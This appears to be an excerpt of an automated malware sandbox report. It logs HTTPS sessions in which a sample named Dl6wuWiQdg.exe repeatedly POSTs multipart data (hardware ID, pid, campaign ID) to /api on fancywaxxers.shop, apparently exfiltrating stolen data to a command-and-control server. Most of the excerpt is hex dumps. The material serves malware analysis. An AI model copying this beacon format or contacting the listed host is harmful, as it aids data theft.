                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 55 4a 37 45 72 50 72 46 4a 49 5a 4a 6f 37 37 6c 6a 35 2f 4a 39 72 7a 56 52 44 6f 36 37 77 68 61 79 6f 74 61 5a 4f 7a 45 2f 39 68 6b 72 79 41 4e 7a 2b 56 6b 38 75 7a 33 47 6e 48 36 76 31 69 53 4b 59 45 6d 79 6f 69 65 32 56 75 4c 58 79 76 67 62 59 42 2f 65 50 43 61 74 45 31 65 4e 63 53 79 7a 4b 64 4f 68 56 35 66 53 58 62 38 56 64 51 62 61 6f 38 34 4f 68 72 4c 6d 7a 53 4d 78 44 2f 49 64 42 2b 41 36 57 6f 68 56 44 50 49 49 6a 70 32 54 6d 2f 5a 46 68 31 68 4a 55 36 72 6d 39 69 61 62 6a 36 75 46 45 7a 30 66 2f 6a 30 58 34 44 4e 66 67 57 30 4d 68 79 33 50 76 51 2b 72 32 6d 57 50 4f 58 55 71 67 70 66 69 4b 72 61 65 30 72 67 69 50 42 2f 65 62 43 61 74 45 2b 63 74 67 42 67 58 34 4f 2f 67 66 38 72 4b 57 62 6f 41 4b 43 36 69 6a 38 59 61 6c 70 62 75 74 51 73 68 4d 2f
                                                                                                              Data Ascii: UJ7ErPrFJIZJo77lj5/J9rzVRDo67whayotaZOzE/9hkryANz+Vk8uz3GnH6v1iSKYEmyoie2VuLXyvgbYB/ePCatE1eNcSyzKdOhV5fSXb8VdQbao84OhrLmzSMxD/IdB+A6WohVDPIIjp2Tm/ZFh1hJU6rm9iabj6uFEz0f/j0X4DNfgW0Mhy3PvQ+r2mWPOXUqgpfiKrae0rgiPB/ebCatE+ctgBgX4O/gf8rKWboAKC6ij8YalpbutQshM/
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 48 30 75 6c 61 52 53 58 45 61 65 42 59 2b 66 79 63 62 63 68 61 51 71 57 6b 2b 49 4f 73 72 37 69 67 54 38 39 4a 2b 4d 4d 48 73 77 50 4f 72 41 30 45 42 64 4a 67 39 55 66 6d 30 35 78 74 67 45 30 46 76 65 44 36 67 75 72 37 38 71 68 61 78 55 72 69 69 6b 37 39 43 39 58 2b 56 45 6b 76 30 48 7a 6f 56 65 7a 2b 6c 32 33 47 55 30 36 75 72 50 71 4c 6f 61 79 2b 34 51 61 42 51 4f 6a 44 45 62 4d 71 33 66 39 43 52 79 72 4a 62 66 77 52 39 4c 79 49 49 73 64 65 43 2f 7a 67 2f 6f 57 68 70 37 4b 74 53 4d 56 4b 38 4a 46 47 39 41 50 66 35 30 64 4f 49 38 56 77 37 31 72 6b 39 49 4e 75 7a 6b 42 4f 74 72 4b 39 77 4f 71 6b 71 75 45 51 67 58 48 33 6b 31 6e 77 52 75 66 36 56 6c 49 76 7a 33 65 6e 54 71 58 72 30 57 58 4d 45 68 50 6b 70 76 4b 48 71 61 79 7a 71 45 54 4d 51 76 6d 47 53 50
                                                                                                              Data Ascii: H0ulaRSXEaeBY+fycbchaQqWk+IOsr7igT89J+MMHswPOrA0EBdJg9Ufm05xtgE0FveD6gur78qhaxUriik79C9X+VEkv0HzoVez+l23GU06urPqLoay+4QaBQOjDEbMq3f9CRyrJbfwR9LyIIsdeC/zg/oWhp7KtSMVK8JFG9APf50dOI8Vw71rk9INuzkBOtrK9wOqkquEQgXH3k1nwRuf6VlIvz3enTqXr0WXMEhPkpvKHqayzqETMQvmGSP
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 5a 30 63 2f 67 6d 53 70 53 4b 76 31 6e 53 4b 59 45 6b 69 6a 6f 2f 79 45 6f 36 2b 39 70 6b 7a 54 54 66 65 52 53 50 49 50 32 2b 42 56 53 53 6e 49 65 75 35 63 35 2f 2b 57 5a 63 39 58 43 2b 72 67 2b 70 62 71 2b 2f 4b 41 52 63 70 4c 71 39 6b 4a 37 45 72 50 72 46 4a 49 5a 4a 6f 37 35 31 76 75 2b 4a 78 68 7a 31 46 5a 70 61 62 76 6a 71 65 70 6f 4b 74 44 78 45 72 39 6a 6b 72 31 41 74 33 67 52 30 30 6b 77 58 43 6e 48 36 76 31 69 53 4b 59 45 6d 69 7a 74 76 65 4a 70 72 57 35 6f 45 76 58 53 75 44 44 42 37 4d 56 30 66 30 56 48 44 4c 53 62 4f 42 4f 70 65 76 52 5a 63 77 53 45 2b 53 6d 39 49 69 74 70 62 79 7a 54 63 64 49 2f 34 70 41 39 77 7a 56 37 46 46 41 49 38 64 34 36 31 72 73 38 5a 35 6d 79 56 78 43 71 2b 43 7a 7a 71 32 37 38 76 6b 49 34 46 7a 7a 6a 30 53 7a 47 35 6a
                                                                                                              Data Ascii: Z0c/gmSpSKv1nSKYEkijo/yEo6+9pkzTTfeRSPIP2+BVSSnIeu5c5/+WZc9XC+rg+pbq+/KARcpLq9kJ7ErPrFJIZJo751vu+Jxhz1FZpabvjqepoKtDxEr9jkr1At3gR00kwXCnH6v1iSKYEmiztveJprW5oEvXSuDDB7MV0f0VHDLSbOBOpevRZcwSE+Sm9IitpbyzTcdI/4pA9wzV7FFAI8d461rs8Z5myVxCq+Czzq278vkI4Fzzj0SzG5j
                                                                                                              2024-12-31 08:48:30 UTC267INData Raw: 6f 4a 38 2f 78 47 7a 73 72 46 70 31 6c 64 4d 73 75 4c 49 6a 61 53 74 74 62 63 49 33 6e 69 2b 77 30 62 70 52 49 37 56 54 41 51 6a 7a 6a 75 2f 45 66 37 31 6b 57 58 61 52 45 79 6f 73 66 61 44 70 6f 47 39 70 6c 37 43 53 50 4f 53 51 4c 38 50 32 36 77 62 42 43 50 61 4f 37 38 52 78 50 57 48 59 65 39 52 57 71 33 67 73 38 36 74 74 66 4c 35 43 50 38 48 34 6f 42 5a 38 41 76 48 30 68 55 63 50 66 77 37 37 45 66 73 34 70 4a 30 79 31 39 48 74 5a 36 39 31 76 37 78 34 50 4d 61 6b 31 69 77 6e 48 61 39 52 4e 65 73 44 58 30 39 67 6d 32 6e 43 62 6d 38 30 58 43 41 43 67 76 6a 6f 2b 2b 63 72 4b 43 6b 6f 67 2f 2f 65 64 65 56 51 2f 51 55 30 66 74 61 42 47 71 43 64 4b 63 4a 30 72 4b 59 5a 64 74 44 58 61 6d 77 2b 73 36 56 37 66 4b 35 43 4a 6b 48 78 59 42 48 2f 51 50 41 2f 52 68 6a
                                                                                                              Data Ascii: oJ8/xGzsrFp1ldMsuLIjaSttbcI3ni+w0bpRI7VTAQjzju/Ef71kWXaREyosfaDpoG9pl7CSPOSQL8P26wbBCPaO78RxPWHYe9RWq3gs86ttfL5CP8H4oBZ8AvH0hUcPfw77Efs4pJ0y19HtZ691v7x4PMak1iwnHa9RNesDX09gm2nCbm80XCACgvjo++crKCkog//edeVQ/QU0ftaBGqCdKcJ0rKYZdtDXamw+s6V7fK5CJkHxYBH/QPA/Rhj
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 32 63 65 36 0d 0a 45 73 67 46 51 4c 2f 50 4f 7a 7a 71 36 79 38 76 6b 59 6b 78 79 6c 30 42 36 6a 56 73 6d 69 54 41 51 79 67 69 4f 31 48 36 76 67 30 54 71 41 46 55 69 32 73 76 75 4e 76 4b 44 31 6e 33 62 6d 58 66 32 46 58 75 49 36 36 4f 74 50 53 53 4c 56 61 71 74 45 36 50 79 66 5a 64 59 53 42 65 53 76 76 64 61 54 34 2f 72 68 64 34 38 48 36 4d 4d 52 73 7a 48 56 34 6c 74 44 4d 74 4d 32 77 45 76 6d 39 49 5a 7a 67 42 77 4c 6f 75 43 6c 33 4f 54 6a 74 72 41 49 6d 52 65 69 32 42 79 67 55 34 61 2b 53 67 6f 39 67 6d 32 6e 43 62 6d 38 30 58 43 41 43 67 76 6a 6f 2b 2b 63 72 4b 43 6b 6f 67 2f 2f 65 64 36 45 54 2f 59 44 78 71 35 37 54 7a 44 46 4f 36 6b 52 35 4c 4c 4a 57 34 41 61 43 35 76 75 76 5a 62 71 2b 2f 4b 55 53 38 39 4a 39 35 56 59 76 69 72 52 36 6c 42 44 4e 49 42
                                                                                                              Data Ascii: 2ce6EsgFQL/POzzq6y8vkYkxyl0B6jVsmiTAQygiO1H6vg0TqAFUi2svuNvKD1n3bmXf2FXuI66OtPSSLVaqtE6PyfZdYSBeSvvdaT4/rhd48H6MMRszHV4ltDMtM2wEvm9IZzgBwLouCl3OTjtrAImRei2BygU4a+Sgo9gm2nCbm80XCACgvjo++crKCkog//ed6ET/YDxq57TzDFO6kR5LLJW4AaC5vuvZbq+/KUS89J95VYvirR6lBDNIB
                                                                                                              2024-12-31 08:48:30 UTC1369INData Raw: 37 4c 57 59 64 4a 41 54 61 65 32 2f 73 6d 55 6e 5a 57 76 54 38 42 52 34 4a 52 47 7a 54 72 44 37 31 74 4b 49 39 52 71 70 78 2b 72 2f 64 45 36 2b 52 49 44 35 4a 2b 7a 7a 72 4c 6a 36 75 46 39 77 6b 6e 2b 68 46 2f 69 53 66 48 69 55 6b 55 79 30 6d 7a 6f 45 61 57 79 6c 79 4b 59 41 41 58 6b 70 4f 7a 4f 38 76 50 67 2b 68 32 53 45 4b 44 52 56 72 30 64 6c 76 6f 56 48 48 61 4d 4f 2f 55 52 73 37 4c 57 59 64 4a 41 54 61 65 32 2f 73 6d 55 6e 5a 57 76 54 38 42 52 34 4a 52 47 76 43 72 67 7a 57 74 36 4d 63 46 31 36 56 62 39 34 39 45 73 67 46 30 4c 2f 4a 6d 39 78 75 71 63 2f 4f 46 51 67 52 2b 77 74 6b 72 39 43 74 48 36 52 41 6b 44 7a 48 7a 6d 52 2f 76 6c 6e 69 33 75 5a 47 72 6b 37 72 32 49 36 76 76 67 37 77 6a 46 56 72 44 62 47 61 46 66 67 37 38 43 46 48 62 64 4e 66 34 52
                                                                                                              Data Ascii: 7LWYdJATae2/smUnZWvT8BR4JRGzTrD71tKI9Rqpx+r/dE6+RID5J+zzrLj6uF9wkn+hF/iSfHiUkUy0mzoEaWylyKYAAXkpOzO8vPg+h2SEKDRVr0dlvoVHHaMO/URs7LWYdJATae2/smUnZWvT8BR4JRGvCrgzWt6McF16Vb949EsgF0L/Jm9xuqc/OFQgR+wtkr9CtH6RAkDzHzmR/vlni3uZGrk7r2I6vvg7wjFVrDbGaFfg78CFHbdNf4R


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649715104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:30 UTC275OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=OCZ4PL09TZ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12811
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:30 UTC12811OUTData Raw: 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                              Data Ascii: --OCZ4PL09TZContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--OCZ4PL09TZContent-Disposition: form-data; name="pid"2--OCZ4PL09TZContent-Disposition: form-data; name="lid"PsFKDg--pablo--OCZ4PL09TZContent-
                                                                                                              2024-12-31 08:48:32 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=fu4h94h1vfqrn4uibt646ivlte; expires=Sat, 26 Apr 2025 02:35:10 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF7gZvX9HfD%2B0F1QQ1raywkqjj1ivYDNVqQxx5bHKy8FmU0TGQxno068r2XxGyngBbNheXRrb6XU0zHbDRjxNz4Ktqfv6rxYCncv3q3fXV%2FeUZl98Du9Pg0oVL83IqQPtB9CQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902d17b0f729f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=13&recv=17&lost=0&retrans=1&sent_bytes=4228&recv_bytes=13744&delivery_rate=111403&cwnd=169&unsent_bytes=0&cid=63512e18cb900c5e&ts=1216&x=0"
                                                                                                              2024-12-31 08:48:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-31 08:48:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649716104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:32 UTC280OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=YKZLOSC2307EF33
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15087
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:32 UTC15087OUTData Raw: 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 4b 5a 4c 4f
                                                                                                              Data Ascii: --YKZLOSC2307EF33Content-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--YKZLOSC2307EF33Content-Disposition: form-data; name="pid"2--YKZLOSC2307EF33Content-Disposition: form-data; name="lid"PsFKDg--pablo--YKZLO
                                                                                                              2024-12-31 08:48:32 UTC1136INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ebv3t3dsrpmv51s1fsi61vb35d; expires=Sat, 26 Apr 2025 02:35:11 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fo%2FDRxR2VV5eetTdpMCDUnnHIqre1TJPBbIar5jPJCDjmeZ8Y1Aii26EbbVWVKzGoUBr4%2BYPjwHywbljl4X%2BugOOVXtG94qRwGdgddCmD5g7sXhw3mk%2B9uBxr%2BMVKvaPwM4ElQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902dc4839424b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1616&rtt_var=623&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=16025&delivery_rate=1806930&cwnd=248&unsent_bytes=0&cid=5e385319b8b7a5c0&ts=373&x=0"
                                                                                                              2024-12-31 08:48:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-31 08:48:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649717104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:33 UTC282OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=GN9DL9BSTQOO2N2JQ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 19957
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:33 UTC15331OUTData Raw: 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                              Data Ascii: --GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="pid"3--GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                              2024-12-31 08:48:33 UTC4626OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                                                                                              Data Ascii: +?2+?2+?o?Mp5p_
                                                                                                              2024-12-31 08:48:34 UTC1133INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:34 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=kdm2g8b537ec7u2pm0cbnv28cr; expires=Sat, 26 Apr 2025 02:35:12 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OjHyyJNNVnE%2FXlP4udOgjA6eFNN691dPPBETCdeF8vnm%2FVXDBdIm5MpQRVSvEFxMVywVy7WJivGI4sINLbe8k9JbIKVa6D1HVGS74oyTsHGlZ0OoPd2nbNzYeY6sP%2BD2c20Xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902e31d12424b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1544&rtt_var=598&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=20919&delivery_rate=1802469&cwnd=248&unsent_bytes=0&cid=84a1a98a0b223d3f&ts=535&x=0"
                                                                                                              2024-12-31 08:48:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-31 08:48:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.649718104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:34 UTC282OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=3Z6B9YVZ08KHLTIK9O
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1226
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:34 UTC1226OUTData Raw: 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                              Data Ascii: --3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="pid"1--3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                              2024-12-31 08:48:35 UTC1136INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:35 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=tvpg7hlidjl227ackp1iqmid6m; expires=Sat, 26 Apr 2025 02:35:14 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BnmdOu9t8JHzYh6AvxqyfnBaztVWH7T8h5rLKu30%2Bzxl6EOAMLyVKubtedf0DiB2D6JU0u1WVjg%2F%2B0oDJ7WEux7zkTFc8gmXGq2L3ix%2BibTJFW2LX3F2y2UbucXftZujY%2F3Z4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902eafc96727b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1968&rtt_var=744&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2144&delivery_rate=1464393&cwnd=232&unsent_bytes=0&cid=77e99532a8f52fe4&ts=440&x=0"
                                                                                                              2024-12-31 08:48:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-31 08:48:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.649725104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:36 UTC275OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=10I2JPD0I
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 572170
                                                                                                              Host: fancywaxxers.shop
